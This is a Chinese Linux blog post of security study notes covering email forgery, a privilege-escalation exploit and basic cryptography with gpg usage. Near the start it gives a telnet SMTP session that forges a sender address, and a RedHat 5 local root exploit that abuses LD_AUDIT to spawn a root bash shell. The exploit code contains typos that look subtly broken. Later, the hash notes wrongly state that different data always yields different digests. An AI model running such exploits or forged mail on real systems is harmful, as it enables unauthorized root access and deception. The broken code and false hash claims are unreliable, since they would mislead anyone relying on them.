安全和加密

安全基础
仿冒别人给某人发邮件
telnet 127.0.0.1 25
helo a.com 命令
mail from:god@heaven.com 从某处发来的邮件
rcpt to:root 给某人发邮件
data 数据
subject:hello 邮件名
I miss you 邮件正文
How old are you
. 点代表结束
quit

redhat5普通用户提升管理员权限脚本
mkdir /tmp/wang
ln /bin/ping /tmp/wang/test
exec 3< /tmp/wang/test
rm -rf /tmp/wang
cat > /tmp/wang.c <<eof
void _attribute_((constrector)) init()
{
setuid(0);
system(“/bin/bash”);
}
eof

gcc -w -fPIC -shared -o /tmp/wang /tmp/wang.c
LD_AUDIT=”$ORIGIN” exec /proc/self/fd/3 &> /dev/null

两种加密体系

加密算法
1算法可以公开
2密钥(口令)不公开

love
orzi 每一位字母向后移三位

凯撒密码

对称
data明文–加密key1–data’密文–解密key2–data明文

对称:key1==key2 加密解密都是相同密钥
非对称:key1 != key2 加密解密是不同密钥

非对称
公钥加密对应的另一把私钥解密 Pa,Sa
私钥加密对应的另一把公钥解密 Pb,Sb

数字签名,数据来源的确认
data明文–加密key1=Sa–data’密文–解密key2=Pa–data明文

DES:1G 2G 4分钟 8分钟 对称的
RSA:1G 1G 1分钟 64hour 非对称的

Pb[Sa(data)]

Sb{Pb[Sa(data)]}=Sa(data)

Pa{Sa(data)}=data

md5 128
sha1 160
sha512 512

hash(data)=digest 摘要(密钥)
1 data不同,摘要必不同(密钥)
2 摘要(密钥)相同,data相同
3 不论data大小,digest大小只能算法有关
4 hash算法,不可逆
md5sum case.sh 得出摘要 16进制 数据不变摘要之不变 得到摘要值推算不出data不可逆
sha1sum f1.sh 160位的16进制数
两种算法已被破解 山东大学教授王小云
sha512sum file

1 Pb[Sa(data)]

2 Pb{data+Sa[hash(data)]}
Sb{Pb{data+Sa[hash(data)]}}=data+Sa[hash(data)]
hash(data)=A
Pa{Sa[hash(data)]}=hash(data)=B
A=B?

3 对称 非 hash
key{data+Sa[hash(data)]}+Pb(key)

密钥交换
DH(Deffie-Hellman)
大素数(大质数)能够被1和自己整除的数字
rpm -V bash 查看文件中元数据是否发生变化,包校验
对称密钥
gpg -c file 加密
gpg -d file.gpg 解密
gpg -o file1 -d file.gpg

非对称密钥
gpg –gen–key 生成密钥对
gpg –list–key
cd .gnupg/ 存放生成的密钥的目录
往别的用户导公钥
gpg -a –export -o /app/file.pubkey 生成易读的格式导出到文件
scp … 拷贝
(7)gpg –import /app/file.pub.key 导入公钥
gpg -e -r magedu(公钥) file 用magedu的公钥加密文件
scp .. 拷贝
(6)gpg -d file.gpg 解密

本文来自投稿,不代表Linux运维部落立场,如若转载,请注明出处:http://www.178linux.com/91185

(0)
上一篇 2018-01-17 15:33
下一篇 2018-01-17 21:59

相关推荐

  • Redis 存储分片之代理服务Twemproxy 测试

    概述 实际业务场景中单点 Redis 容量、并发都是有限的,所以有 Redis Cluster 的需求。 但是官方的 Redis Cluster 一再跳票,还不可用。 只好先使用最简单的方式:Proxy。有很多可选,但在大范围生产使用的, Twitter 开源的 Twemproxy  看起来是个理想的选择 – https://…

    Linux干货 2015-03-10
  • FHS文件系统各目录功能

    / 根目录。 包含了几乎所的文件目录。相当于中央系统。进入的最简单方法是:cd /。 /boot 引导程序,内核等存放的目录。 这个目录,包括了在引导过程中所必需的文件,引导程序的相关文件(例如grub,lilo以及相应的配置文件以及Linux操作系统内核相关文件(例如vmlinuz等一般都存放在这里。在最开始的启动阶…

    Linux干货 2016-10-20
  • linux之/home目录转移分区。

    linux之/home目录转移分区。     I,基本思路,将/home目录的数据转移到新的分区,再将/home目录挂载到新的分区。     II,添加硬盘,进行分区,添加新硬盘不重启机器识别命令echo “- – -”  /sys/class/scsi_host/host#/scan,然后进行 …

    Linux干货 2017-06-19
  • LAMP分离环境的搭建(最新版本的mysql+php+http源码编译安装)

    实验者:FrankStar      实验日期:20150628 任务:主要是实现在Linux环境下配置LAMP环境,利用VMware+centos6.4实现,将LAMP分离为多台主机; 附注:由于大家的环境不一样,可能有些人已经安装了这个包或者那个软件,所以调试的环境结果也不一样,为了尽量能模拟到 可能出现的所有问题,在编译会…

    Linux干货 2015-06-30
  • N25-第八周

    1、写一个脚本,使用ping命令探测172.16.250.1-172.16.250.254之间的所有主机的在线状态; 在线的主机使用绿色显示; 不在线的主使用红色显示; #!/bin/bash ipnet=172.16.250. trap ‘trap_action’ INT trap_action() { break return 1 } for ((i=1…

    Linux干货 2017-05-27
  • 网络配置管理:ifcfg、iproute2和ss等相关命令介绍(不完整,需要后期完善)

    网络配置管理:ifcfg、iproute2和ss等相关命令介绍 ifcfg家族: ifconfig [interface] ifconfig interface [aftype] options | address …   -a :查看所有 接口信息 add<地址>:设置网络设备IPv6的ip地址 del<地址>…

    Linux干货 2017-01-19